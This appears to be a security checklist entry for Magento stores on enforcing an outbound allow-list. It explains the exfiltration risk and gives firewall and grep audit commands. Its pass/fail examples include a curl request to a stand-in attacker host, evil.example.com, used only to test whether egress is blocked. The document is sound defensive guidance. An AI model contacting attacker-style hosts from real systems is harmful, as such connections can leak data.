—

Why it Matters

Magento and its extensions often make outbound HTTP requests to third-party services (payment gateways, shipping APIs, email providers, update servers). If outbound traffic is unrestricted, a compromised extension or attacker could exfiltrate sensitive data to arbitrary destinations or call malicious services.

Enforcing an outbound allow-list ensures that only approved domains and services are reachable from production servers, reducing the risk of data leakage and command-and-control callbacks.

Verification Steps

Network policy check

# Review firewall or egress rules
iptables -L OUTPUT
ufw status

# Expected: outbound restricted to known services only

Magento extension audit

# Search for curl/http client usage in extensions
grep -R "curl_init" app/code vendor/
grep -R "Http\\Client" app/code vendor/

# Ensure destinations match allow-listed APIs

Remediation / Fix Guidance

Create an outbound allow-list including only:
- Payment providers (PayPal, Stripe, Adyen, etc.)
- Shipping APIs (FedEx, UPS, DHL, etc.)
- Official Magento/Packagist update sources
- Other explicitly required integrations
Block all other outbound connections at the firewall or security group level.
Audit extensions regularly to ensure no hidden calls to untrusted domains.
Log outbound requests and monitor for attempted connections outside the allow-list.

Examples

Fail Example

# Outbound unrestricted
$ curl -I http://evil.example.com
HTTP/1.1 200 OK
# Store can connect anywhere → FAIL

Pass Example

# Outbound restricted by firewall
$ curl -I http://evil.example.com
curl: (7) Failed to connect
# Only allow-listed domains (e.g., PayPal, UPS) reachable → PASS